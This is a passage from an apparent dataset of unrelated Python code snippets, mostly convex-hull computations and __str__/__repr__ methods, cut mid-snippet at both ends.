cv2.convexHull(c, False, False, False)\n if ctx.hull is not None:\n d = cv2.convexityDefects(c, ctx.hull, None)\n if d is not None:\n if len(d) <= max_defects:\n continue\n ctx.num_defects = len(d)\n max_defects = ctx.num_defects\n defects = d\n contour = c\n\n if defects is None:\n return\n\n # calculate hand center via mean of defect depth points\n x = 0\n y = 0\n for d in defects:\n depth_point = contour[d[0][2]]\n x += depth_point[0][0]\n y += depth_point[0][1]\n\n x = int(x / len(defects))\n y = int(y / len(defects))\n ctx.hand_center = (x, y)\n\n # calculate hand radius as mean of distances\n dist = 0\n for d in defects:\n depth_point = contour[d[0][2]]\n dx, dy = depth_point[0][0], depth_point[0][1]\n dist += math.sqrt(math.pow(x - dx, 2) * math.pow(y - dy, 2))\n ctx.hand_radius = int(dist / len(defects))", "def main():\n print(\"\\nHello world from hull.py\\n\")\n\n all_hulls = Hull.get_hulls()\n for key in all_hulls.keys():\n print(all_hulls[key], \"\\n\")\n time.sleep(0.01)\n print(\"\\n^ These are all the hulls I can make.\")\n print(\"Total number of hulls = %i\" % (len(all_hulls)))", "def extract_hull_from_shapefile ( logger, shape_file ) :\n try :\n logger.info ( \"Extract hull from shapefile \" + str(shape_file) ) \n fIn = ogr.Open ( str(shape_file) )\n layer = fIn.GetLayer(0)\n feature = layer.GetNextFeature() \n geom = feature.GetGeometryRef()\n hull_wkt = str(geom.ExportToWkt())\n return hull_wkt\n except Exception, err:\n logger.critical(\"Extract hull from shapefile failed: ERROR: %s\\n\" % str(err))\n raise", "def __CalculateConvexHull(self, contour):\r\n return cv2.convexHull(contour)", "def _repr_(self):\n return (\"%d-d CPR-Fano toric variety covered by %d affine patches\"\n % (self.dimension_relative(), self.fan().ngenerating_cones()))", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def Problem11():\n return 'Ductile Coulomb-Mohr'", "def _repr_(self):\n return \"Hyperbolic plane\"", "def ellipseDesc(lps):\r\n unit = 100 #units in QualiTree are in [mm], hence Pgl is in [dm] ?\r\n\r\n if isinstance(lps, pgl.Translated):\r\n cx, cy, cz = lps.translation\r\n else:\r\n print\"missing Translated from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n\r\n ori = lps.geometry\r\n\r\n if isinstance(ori, pgl.Oriented):\r\n rotMat = ori.transformation().getMatrix3()\r\n az, el, roll = rotMat.eulerAnglesZYX()\r\n else:\r\n print\"missing Oriented from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n az = 0\r\n \r\n scal = ori.geometry\r\n\r\n if isinstance(scal, pgl.Scaled):\r\n scMat = scal.transformation().getMatrix()\r\n rx, ry, rz, rt = scMat.getDiagonal()\r\n else:\r\n print\"missing Scaled from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n rx=ry=rz=1\r\n\r\n #x1, y1, z1 #Conversion repère MappleT (m) à reprère Qualitree (q) : Xq=Xm Yq=Zm Zq=-Ym. \r\n #Due to change of coordinate axis, rotation needs - pi <-- apparently not !\r\n #return cx*unit, cz*unit, -cy*unit, rx*unit, rz*unit, ry*unit, az-3.1415927\r\n\r\n return cx*unit, cz*unit, -cy*unit, rx*unit, rz*unit, ry*unit, az", "def algorithmInfo():\n\t\treturn r\"\"\"Fister Jr., Iztok and Fister, Dusan and Yang, Xin-She. \"A Hybrid Bat Algorithm\". Elektrotehniski vestnik, 2013. 1-7.\"\"\"", "def _repr_(self):\n return \"Lie algebra %s over %s\" % (self._classification,\n self.base_ring())", "def __str__(self):\n return \"--> \"+self.__name+ \\\n \" :\\n dimensions : [\"+str(self.xmin)+\",\"+str(self.xmax)+\"]x[\"+ \\\n str(self.ymin)+\",\"+str(self.ymax)+\"]\"+ \\\n \"\\n width : \"+str(self.width)+\" height : \"+str(self.height)+ \\\n \"\\n background image : \"+str(self.__background)+ \\\n \"\\n image of the domain : \"+str(self.__image_filename)+ \\\n \"\\n walls : \"+str(self.__walls)+ \\\n \"\\n doors : \"+str(self.__doors)", "def __str__(self):\n segments = []\n if self.comment:\n segments.append('\"%s\"' % self.comment)\n if self.sg:\n if self.dbow_words:\n segments.append('dbow+w') # also training words\n else:\n segments.append('dbow') # PV-DBOW (skip-gram-style)\n\n else: # PV-DM...\n if self.dm_concat:\n segments.append('dm/c') # ...with concatenative context layer\n else:\n if self.cbow_mean:\n segments.append('dm/m')\n else:\n segments.append('dm/s')\n segments.append('d%d' % self.docvecs.vector_size) # dimensions\n if self.negative:\n segments.append('n%d' % self.negative) # negative samples\n if self.hs:\n segments.append('hs')\n if not self.sg or (self.sg and self.dbow_words):\n segments.append('w%d' % self.window) # window size, when relevant\n if self.vocabulary.min_count > 1:\n segments.append('mc%d' % self.vocabulary.min_count)\n if self.vocabulary.sample > 0:\n segments.append('s%g' % self.vocabulary.sample)\n if self.workers > 1:\n segments.append('t%d' % self.workers)\n return '%s(%s)' % (self.__class__.__name__, ','.join(segments))", "def __repr__(self) -> str:\n argument_dict = {\n \"T_e\": self.T_e,\n \"n_e\": self.n_e,\n \"particle\": self.particle,\n \"Z\": self.Z,\n }\n\n return code_repr.call_string(PlasmaBlob, (), argument_dict)", "def __str__(self) -> str:\n st = \"<solid:\" + str(self.id) + \">\\n{\\n\"\n for s in self.sides:\n st += str(s) + \"\\n\"\n st += \"}\"\n return st", "def plot_hull(self, **kwargs):\n from matador.plotting.hull_plotting import plot_ensemble_hull\n\n return plot_ensemble_hull(\n self, self.data_key, formation_energy_key=self.formation_key, **kwargs\n )", "def __str__(self):\r\n out = \"##\"*(self.width+1)+\"\\n\"\r\n for i in range(self.height):\r\n out += \"#\"\r\n for j in range(self.width):\r\n if self.grid[i][j] == 0:\r\n out += \"##\"\r\n else:\r\n if not self.showSolution:\r\n out += \" \"\r\n elif (i,j) in self.solution:\r\n out += \"**\"\r\n else:\r\n out += \" \"\r\n out += \"#\\n\"\r\n return out + \"##\"*(self.width+1)", "def visualize_pool ( self, pool_id=None ):\n try:\n pool = self._poolstack [ -1 if pool_id is None else pool_id ]\n except IndexError:\n return \"\"\n else:\n return '\\n'.join ( pool.export_rules() )", "def convex_hull(L):\r\n CH=list()\r\n if L != []:\r\n P = list(L)\r\n # find the starting point of the algorithm and add it to the convex hull:\r\n ind0 = find_start(P)\r\n CH.append(P.pop(ind0))\r\n # find the next point and add it to the convex hull list CH:\r\n if P != []:\r\n ind1 = next_in_hull(CH[0], np.array([1,0]), P)\r\n CH.append(P.pop(ind1))\r\n # use the hyperplane criterion as function side_points to complete CH:\r\n while P != []:\r\n p = CH[-2]\r\n q = CH[-1]\r\n v = q - p \r\n P = side_points(CH[0], CH[-1] - CH[0], P)\r\n ind = next_in_hull(q, v, P)\r\n if P != []:\r\n CH.append(P.pop(ind))\r\n return CH", "def _repr_(self):\n return \"Category of hyperbolic models of {}\".format(self.base())", "def __str__(self):\n vList = []\n for vertex in self:\n vList.append(vertex.name)\n gStr = \"The DiGraph contains _vertices: {0}\".format(\" \".join(vList))\n return gStr", "def eddy_floyd(points, side=\"\", p_min=[], p_max=[], show=True, save=False, detailed=True):\n# :param points: the points from which to find the convex hull\n# :param side: if \"up\", we care about the points above the line (p_min,p_max), else, below\n# :param p_min: the point on the left of the line (min = min abscissa)\n# :param p_max: the point on the right of the line\n# :param show: if True, the progress in constructing the hull will be plotted on each iteration in a window\n# :param save: if True, the progress in constructing the hull will be saved on each iteration in a .png file\n# :param detailed: if True, even non convex explored polygons are plotted\n if p_min==[] or p_max==[]:\n #Find the point the most on the left (p_min) and the most on the right (p_max)\n p_min,p_max=points[0],points[0]\n for p in points:\n if p[0]<p_min[0]: p_min=p\n if p[0]>p_max[0]: p_max=p\n\n #Divide the points in 2 subproblems (E2=above line, E1=below line)\n #Remark: p_min and p_max are neither in E2 nore in E1 \n E1,E2=[],[]\n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>0: E2+=[p]\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<0: E1+=[p]\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_2=eddy_floyd(E2,side=\"up\",p_min=p_min,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_max]+to_be_returned_2+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned_1=eddy_floyd(E1,side=\"down\",p_min=p_min,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_min]+to_be_returned_1+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n return [p_max]+to_be_returned_2+[p_min]+to_be_returned_1\n\n \"\"\"End algorithm ?\"\"\"\n #Find if points remain outside the line (either above if up or below if done)\n end=True\n i=0\n while end and i<len(points):\n p=points[i]\n if side==\"up\" and (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>0: end=False \n if side==\"down\" and (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<0: end=False \n i+=1\n\n \"\"\"Intermidiate case, look for the furthest point and divide the pb in 2 pbs\"\"\"\n if not end:\n p_extr,dist=p_min,0\n E1,E2=[],[]\n if side==\"up\":\n #Find the furthest point from the line (above)\n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>dist:\n p_extr,dist=p,(p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])\n \n #Divide the points which are still outside of the 2 lines in 2 subproblems\n for p in points:\n if (p[1]-p_extr[1])*(p_max[0]-p_extr[0])-(p_max[1]-p_extr[1])*(p[0]-p_extr[0])>0: E2+=[p]\n if (p[1]-p_min[1])*(p_extr[0]-p_min[0])-(p_extr[1]-p_min[1])*(p[0]-p_min[0])>0: E1+=[p]\n\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_1=eddy_floyd(E1,side=side,p_min=p_min,p_max=p_extr,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_extr]+to_be_returned_1+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned_2=eddy_floyd(E2,side=side,p_min=p_extr,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_max]+to_be_returned_2+[p_extr]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned=to_be_returned_2+[p_extr]+to_be_returned_1\n if (show or save) and len(to_be_returned)>2:\n scatter_plot(points, [[p_max]+to_be_returned+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n print\n return to_be_returned \n\n if side==\"down\":\n #Find the furthest point from the line (below) \n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<dist:\n p_extr,dist=p,(p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])\n \n #Divide the points which are still outside of the 2 lines in 2 subproblems \n for p in points:\n if (p[1]-p_min[1])*(p_extr[0]-p_min[0])-(p_extr[1]-p_min[1])*(p[0]-p_min[0])<0: E2+=[p]\n if (p[1]-p_extr[1])*(p_max[0]-p_extr[0])-(p_max[1]-p_extr[1])*(p[0]-p_extr[0])<0: E1+=[p]\n\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_2=eddy_floyd(E2,side=side,p_min=p_min,p_max=p_extr,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_min]+to_be_returned_2+[p_extr]], title=\"eddy-floyd search\", show=show, save=save)\n print\n to_be_returned_1=eddy_floyd(E1,side=side,p_min=p_extr,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_extr]+to_be_returned_1+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n print\n to_be_returned=to_be_returned_2+[p_extr]+to_be_returned_1\n if (show or save) and len(to_be_returned)>2:\n scatter_plot(points, [[p_min]+to_be_returned+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n print\n return to_be_returned \n \n \"\"\"End case\"\"\"\n if end:\n return []\n\n \"\"\"None of these cases\"\"\"\n print(\"ERREUR\")\n return []", "def __repr__(self) -> str:\n return f\"Graph: |V|= {self.v_size()}, |E|= {self.e_size()}\"", "def convex_hull(self, other):\n hull_vertices = self.vertices() + other.vertices()\n hull_rays = self.rays() + other.rays()\n hull_lines = self.lines() + other.lines()\n hull_field = self.coerce_field(other)\n return Polyhedron(vertices=hull_vertices, \n rays=hull_rays, lines=hull_lines, \n field=hull_field)", "def convexHull(stimulus_class, subject_list, data_dir, save_dir, save_fig=False):\n\t\n\tfig = plt.figure(figsize=(15,9))\n\tax = fig.subplots()\n\tif stimulus_class == 'TIMIT':\n\t\tprint('TIMIT')\n\t\tplt.plot([-0.2, 1.0], [-0.2, 1.0], 'black', label='unity')\n\n\t\t\n\telif stimulus_class == 'MT':\n\t\tprint('trailers')\n\t\tplt.plot([-0.1, 0.5], [-0.1, 0.5], 'black', label='unity')\n\n\telse:\n\t\tprint('Undefined stimulus class')\n\t# plt.axis('tight')\n\t# plt.axis('square')\n\n\tcorrs = []\n\tcorrs_sig = []\n\t#corrs_nonsig = []\n\tfor idx, s in enumerate(subject_list):\n\t\twith h5py.File('%s/%s/%s_STRF_by_binned_pitches_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as fh: #full model\n\t\t\tfullModel = fh['corrs_%s_norm' %(stimulus_class.lower())][:] \n\t\t\tfullModel[np.isinf(fullModel)]=0\n\t\t\tp_vals_full = fh['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#full_nonsig = (fullModel[np.where(p_vals_full[0] > 0.05)])\n\t\t\tfull_sig = (fullModel[np.where(p_vals_full[0] < 0.05)])\n\n\t\t\t#binned pitch full model \n\t\twith h5py.File('%s/%s/%s_STRF_by_binned_pitch_only_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as fh: #full model\n\t\t\tpitch = fh['corrs_%s_norm' %(stimulus_class.lower())][:] \n\t\t\tpitch[np.isinf(pitch)]=0\n\t\t\tp_val_pitch = fh['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#binned_full_nonsig = (pitch[np.where(p_vals_full[0] > 0.05)])\n\t\t\tbinned_full_sig = (pitch[np.where(p_vals_full[0] < 0.05)])\n\t\t\tprint(pitch)\n\n\t\twith h5py.File('%s/%s/%s_STRF_by_envs_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as h: #envs model only \n\t\t\tenvs = h['corrs_%s_norm' %(stimulus_class.lower())][:]\n\t\t\tenvs[np.isinf(envs)]=0\n\t\t\tp_vals_envs = h['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#envs_nonsig = (envs[np.where(p_vals_full[0] > 0.05)])\n\t\t\tenvs_sig = (envs[np.where(p_vals_full[0] < 0.05)])\n\n\t\twith h5py.File('%s/%s/%s_STRF_by_phnfeat_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as h: #phnfeat model only \n\t\t\tphnfeat = h['corrs_%s_norm' %(stimulus_class.lower())][:]\n\t\t\tphnfeat[np.isinf(phnfeat)]=0\n\t\t\tp_vals_phnfeat = h['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#phnfeat_nonsig = (phnfeat[np.where(p_vals_full[0] > 0.05)])\n\t\t\tphnfeat_sig = (phnfeat[np.where(p_vals_full[0] < 0.05)])\n\n\t\tcorrs.append([fullModel, envs, phnfeat, pitch])\n\t\t#corrs_nonsig.append([full_nonsig, envs_nonsig, phnfeat_nonsig, binned_full_nonsig])\n\t\tcorrs_sig.append([full_sig, envs_sig, phnfeat_sig, binned_full_sig])\n\n\tpoints = np.hstack(corrs).T\n\tpoints_sig = np.hstack(corrs_sig).T\n\t#points_nonsig = np.hstack(corrs_nonsig).T\n\n\thull1=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,1])).T) #full model, envs\n\thullv1 = hull1.vertices.copy()\n\thullv1 = np.append(hullv1, hullv1[0])\n\tprint(hullv1)\n\n\thull2=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,2])).T) #full model, phnfeat\n\thullv2 = hull2.vertices.copy()\n\thullv2 = np.append(hullv2, hullv2[0])\n\tprint(hullv2)\n\n\thull3=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,3])).T) #full model, pitch\n\thullv3 = hull3.vertices.copy()\n\thullv3 = np.append(hullv3, hullv3[0])\n\tprint(hullv3)\n\n\n\t#fill between: \n\tplt.fill(points_sig[hullv2,0], points_sig[hullv2,2], facecolor='#cd1a1e', alpha=0.4, zorder=3, label='full vs. phnfeat') #phnfeat\n\tplt.fill(points_sig[hullv3,0], points_sig[hullv3,3], facecolor='#64a7bc', alpha=0.4, zorder=1, label='full vs. pitch') #pitch \n\tplt.fill(points_sig[hullv1,0], points_sig[hullv1,1], facecolor='#808080', alpha=0.4, zorder=2, label='full vs. envs') #envs\n\n\t# plt.fill(points[hullv4,0], points[hullv4,4], facecolor='#4B8B3B', alpha=0.4, zorder=4, label='full vs. binned_pitch')\n\n\n\tplt.plot(points_sig[:,0], points_sig[:,1], '.', color='#808080', alpha=0.8) #envs\n\tplt.plot(points_sig[:,0], points_sig[:,2], '.', color='#cd1a1e', alpha=0.8) #phnfeat\n\tplt.plot(points_sig[:,0], points_sig[:,3], '.', color='#64a7bc',alpha=0.8) #pitch\n\t# plt.plot(points_sig[:,0], points_sig[:,4], '.', color='#4B8B3B', alpha=0.8) #binned pitch \n\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,1], '.', color='#CDC1C5', alpha=0.7) #envs\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,2], '.', color='#CDC1C5', alpha=0.7) #phnfeat\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,3], '.', color='#CDC1C5',alpha=0.7) #pitch\n\t# # plt.plot(points_nonsig[:,0], points_nonsig[:,4], '.', color='#CDC1C5', alpha=0.7) #binned pitch non sig\n\t\n\tplt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n\tplt.xlabel('Full model correlation values (r)')\n\tplt.ylabel('Individual model correlation values (r)')\n\tplt.title('Convex-Hull for %s (Feature distribution across subjects)' %(stimulus_class))\n\tplt.axis('tight')\n\tplt.axis('square')\n\t\n\t#save figure\n\tif save_fig:\n\t\tplt.savefig('%s/%s_ConvexHull.pdf' %(save_dir, stimulus_class))", "def __str__(self):\n value = str(self.puzzle) + str(\" \") + str(self.g) + str(\" \") + str(self.h)\n return value", "def __repr__(self):\n return ''.join(f'\\ncompany: {self.company_name}\\nsize: {self.company_size}\\ncompany_founded: '\n f'{self.company_founded}\\ncompany_industry: {self.company_industry}\\ncompany_sector: '\n f'{self.company_sector}\\ncompany_type: {self.company_type}\\ncompany_rating: '\n f'{self.company_rating}\\ncompany_competitors: {self.company_competitors}\\ncompany_revenue: '\n f'{self.company_revenue}\\ncompany_headquarters: {self.company_headquarters}')", "def __str__(self):\n string = ''\n for degree, coef in enumerate(self.coefs, 1):\n degree = degree - 1\n string += str(coef)+'x^' + str(degree) + ' + '\n string = string[0:-3] # remove the last ' + '\n return string", "def plane_desc(self) -> str:\n return self.planes[0].join(' ') + self.planes[1].join(' ') + self.planes[2].join(' ')", "def teselado(self,points):\n #muestrea todo el espacio de la envolvente para conseguir las fronteras de decision a intervalos regulares \n #get_hull\n area = boundingbox(points)\n #(min_x,min_y),(max_x,min_y),(max_x,max_y),(min_x,max_y)\n #sample inside hull\n lat_sample = np.arange(min_y, max_y, 0.001).tolist()\n lon_sample = np.arange(min_x,max_x, 0.001)\n sampling_space = [[x,y] for x in lat_sample for y in lon_sample]\n sampling_space = np.asarray(sampling_space, dtype=np.float32)\n prediction = kmeans_instance.predict(sampling_space)\n pol = [[list(sampling_space[index]) for index in [i for i, j in enumerate(prediction) if j == k]] for k in range(centers)]\n hull = [shapely.geometry.MultiPoint(pol[i]).convex_hull.exterior._get_coords() for i in range(len(pol))]", "def get_name():\n return \"SVMd+ - simplified approach\"", "def __str__(self):\n return \"Normal:\" + str(self.norm) + \"\\nColour:\" + self.colour", "def description(self) -> str:\n return f\"Maximize number of {colour_name(self.colour)} unit cells \" \\\n f\"that form a blob by touching sides. \" \\\n f\"Touching corners doesn't count\"", "def get_string(self):\n this_column_specifier = (\n TABLE_NUMROWS_SEP + \"l\" + TABLE_NUMROWS_SEP + TABLE_NUMROWS_SEP + \n TABLE_NUMROWS_SEP.join([\"c\" for col in xrange(self._num_cols)]) +\n TABLE_NUMROWS_SEP)\n this_column_headers = TABLE_COLSEP.join(\n [\"\"] + [str(top_header_elt) for top_header_elt in self._top_header])\n this_chart_header = CHART_HEADER_TEMPLATE.substitute(\n column_specifier = this_column_specifier,\n caption = self._caption,\n tag = self._tag,\n column_headers = this_column_headers)\n this_chart_content = (TABLE_ROWSEP + os.linesep).join(\n [TABLE_COLSEP.join([str(left_elt)] +\n [str(self._cells[top_elt][left_elt])\n for top_elt in self._top_header])\n for left_elt in self._left_header])\n return os.linesep.join([this_chart_header, this_chart_content,\n CHART_FOOTER])", "def algorithmInfo():\n\t\treturn r\"\"\"TODO\"\"\"", "def __str__(self):\n return_string = self.name + \"\\n\" + str(self.traits)\n\n return return_string", "def descString(self):\n return \"\".join ([self.Name, \" (\", str(self.RollCount), \"d\"\\\n , str(self.RollMax), \"; \", str(self.CritRollMin), \"-\"\\\n , str(self.CritRollMax), \"x\", str (self.CritRollMult)\\\n , \") - \", str(self.Value), \" gp\"])", "def __str__(self):\n\n def onoff(boolean):\n \"\"\"Retorna on/off en funcion del valor booleano\"\"\"\n if boolean:\n return \"on\"\n else:\n return \"off\"\n\n def getPropList():\n s = []\n for prop in self._getPropName():\n s.append(str(prop))\n return \", \".join(s)\n\n def getFunctList():\n s = self.getBindedNames()\n if s == \"\":\n s = \"None\"\n return s\n\n return \"Particle: {15}\\nXYZ position: ({0},{1},{2})\\nAngular velocity: ({3},{4},{5}); ({9},{10},{11})\\nLinear velocity: ({6},{7},{8})); ({12},{13},{14})\\nBinded functions: {16}\\nProperties: {17}\".format(\n round(self.getX(), PARTICLES_ROUND), round(self.getY(), PARTICLES_ROUND),\n round(self.getZ(), PARTICLES_ROUND), round(self.getAngVelX(), PARTICLES_ROUND),\n round(self.getAngVelY(), PARTICLES_ROUND), round(self.getAngVelZ(), PARTICLES_ROUND),\n round(self.getVelX(), PARTICLES_ROUND), round(self.getVelY(), PARTICLES_ROUND),\n round(self.getVelZ(), PARTICLES_ROUND), onoff(self.hasMovementAngX()), onoff(self.hasMovementAngY()),\n onoff(self.hasMovementAngZ()), onoff(self.hasMovementX()), onoff(self.hasMovementY()),\n onoff(self.hasMovementZ()), self.getName(), getFunctList(), getPropList())", "def test_convex_init(self):\n print(\"Convex_Init\")\n finder = dc.dock.ConvexHullPocketFinder()", "def __repr__(self):\n \n s = '#cpt palette generated by gmt_interface.py\\n'\n s += '#COLOR_MODEL = %s\\n' %self.color_model\n s += '#\\n'\n \n for seg in self.segments:\n\n #print x, seg\n xmin = seg.lower_bound\n xmax = seg.upper_bound\n\n rgb_min = seg.rgb_min\n rgb_max = rgb_min + seg.rgb_dif\n \n # Determine number of decimal points\n xmax-xmin\n \n fmin = format_string(xmin) \n fmax = format_string(xmax)\n\n s += fmin %xmin\n s += ' %d %d %d ' %(rgb_min[0], rgb_min[1], rgb_min[2]) \n s += fmax %xmax\n s += ' %d %d %d ' %(rgb_max[0], rgb_max[1], rgb_max[2])\n s += ' %s' %seg.color_segment_boundary\n s += '\\n'\n \n return s", "def __str__(self):\r\n out = (\r\n ' *** Grid dimensions ***\\n'\r\n ' Origin: ( {0.ox:f}, {0.oy:f}, {0.oz:f})\\n'\r\n ' Delta: ( {0.dx:f}, {0.dy:f}, {0.dz:f})\\n'\r\n ' Size: ( {0.lx:f}, {0.ly:f}, {0.lz:f})\\n'\r\n ' N: ( {0.nx:d}, {0.ny:d}, {0.nz:d})\\n'\r\n ' type: {0.gtype}\\n'\r\n ' points: {0.points}\\n'\r\n ' cells: {0.cells}\\n'\r\n ' name: {0.gname}\\n'\r\n ).format(self)\r\n\r\n return out", "def __repr__(self) -> str:\n return f\"key:{self.key},pos:{self.pos},inside:{self.get_inside()},outside:{self.get_outside()}\"", "def __repr__(self):\n rep = \"alg_cluster.Cluster(\"\n rep += str(self._fips_codes) + \", \"\n rep += str(self._horiz_center) + \", \"\n rep += str(self._vert_center) + \", \"\n rep += str(self._total_population) + \", \"\n rep += str(self._averaged_risk) + \")\"\n return rep", "def __repr__(self):\n rep = \"alg_cluster.Cluster(\"\n rep += str(self._fips_codes) + \", \"\n rep += str(self._horiz_center) + \", \"\n rep += str(self._vert_center) + \", \"\n rep += str(self._total_population) + \", \"\n rep += str(self._averaged_risk) + \")\"\n return rep", "def __str__(self) -> str:\n\n return f\"Graph: | V |= {self.v_size()}, | E |= {self.e_size()}\"", "def __str__(self):\n header = [\n ' GnoweeHeuristics:']\n header += [('Population = {}').format(self.population)]\n header += [('Sampling Method = {}').format(self.initSampling)]\n header += [('Discovery Fraction = {}').format(self.fracMutation)]\n header += [('Elitism Fraction = {}').format(self.fracElite)]\n header += [('Levy Fraction = {}').format(self.fracLevy)]\n header += [('Levy Alpha = {}').format(self.alpha)]\n header += [('Levy Gamma = {}').format(self.gamma)]\n header += [('Levy Independent Samples = {}').format(self.n)]\n header += [('Levy Scaling Parameter = {}').format(self.scalingFactor)]\n header += [('Constraint Violaition Penalty = {}').format(self.penalty)]\n header += [('Max # of Generations = {}').format(self.maxGens)]\n header += [('Max # of Function Evaluations = {}').format(self.maxFevals)]\n header += [('Convergence Tolerance = {}').format(self.convTol)]\n header += [('Stall Limit = {}').format(self.stallLimit)]\n header += [('Optimal Convergence Tolerance = {}').format(self.optConvTol)]\n header += [' Attributes Inhereted from ProblemParameters:']\n header += [('{}').format(ProblemParameters.__str__(self))]\n return ('\\n').join(header) + '\\n'", "def convex_hull(image):\n\n corners = find_corners(image)\n\n\n vertices = [corners[0]]\n\n for i in range(len(corners)):\n vertices.extend(\n _convex_hull_side(\n image, corners[i], corners[(i + 1) % len(corners)]))\n\n return vertices", "def __str__(self):\n reprStr = 'Help Mario build Iron Man suit!'+'\\n' +'To make the ' + self._name + ',you need:'+'\\n'\n for part in self._supplies:\n reprStr = reprStr + str(part.getCount()) + ' ' + part.getData() + '\\n'\n return reprStr", "def __str__(self):\n return \"f(\" + \",\".join([str(p) for p in self.points]) + \")\"", "def convex_pieces(self, config):\n # get volume\n orig_volume = self.mesh_.get_total_volume()\n \n # convert to off\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(self.obj_filename, self.off_filename) \n os.system(meshlabserver_cmd)\n logging.info('MeshlabServer OFF Conversion Command: %s' %(meshlabserver_cmd))\n\n if not os.path.exists(off_filename):\n logging.warning('Meshlab conversion failed for %s' %(off_filename))\n return\n \n # create convex pieces\n cvx_decomp_command = config['hacd_cmd_template'] %(self.off_filename,\n config['min_num_clusters'],\n config['max_concavity'],\n config['invert_input_faces'],\n config['extra_dist_points'],\n config['add_faces_points'],\n config['connected_components_dist'],\n config['target_num_triangles'])\n logging.info('CV Decomp Command: %s' %(cvx_decomp_command))\n os.system(cvx_decomp_command) \n\n # convert each wrl to an obj and an stl\n convex_piece_files = glob.glob('%s_dec_hacd_*.wrl' %(os.path.join(self.file_path_, self.file_root_)))\n convex_piece_meshes = []\n total_volume = 0.0\n\n for convex_piece_file in convex_piece_files:\n file_root, file_ext = os.path.splitext(convex_piece_file)\n obj_filename = file_root + '.obj'\n stl_filename = file_root + '.stl'\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(convex_piece_file, obj_filename) \n os.system(meshlabserver_cmd)\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(convex_piece_file, stl_filename) \n os.system(meshlabserver_cmd)\n\n of = obj_file.ObjFile(obj_filename)\n convex_piece = of.read()\n total_volume += convex_piece.get_total_volume()\n convex_piece_meshes.append(of.read())\n\n root = et.Element('robot', name=\"test\")\n\n # get the masses and moments of inertia\n effective_density = orig_volume / total_volume\n prev_piece_name = None\n for convex_piece, filename in zip(convex_piece_meshes, convex_piece_files):\n convex_piece.set_center_of_mass(np.zeros(3))\n convex_piece.set_density(self.mesh_.density * effective_density)\n \n # write to xml\n piece_name = 'link_%s'%(file_root)\n file_path_wo_ext, file_ext = os.path.splitext(filename)\n file_path, file_root = os.path.split(file_path_wo_ext)\n I = convex_piece.inertia\n link = et.SubElement(root, 'link', name=piece_name)\n\n inertial = et.SubElement(link, 'inertial')\n origin = et.SubElement(inertial, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n mass = et.SubElement(inertial, 'mass', value='%f'%convex_piece.mass)\n inertia = et.SubElement(inertial, 'inertia', ixx='%f'%I[0,0], ixy='%f'%I[0,1], ixz='%f'%I[0,2],\n 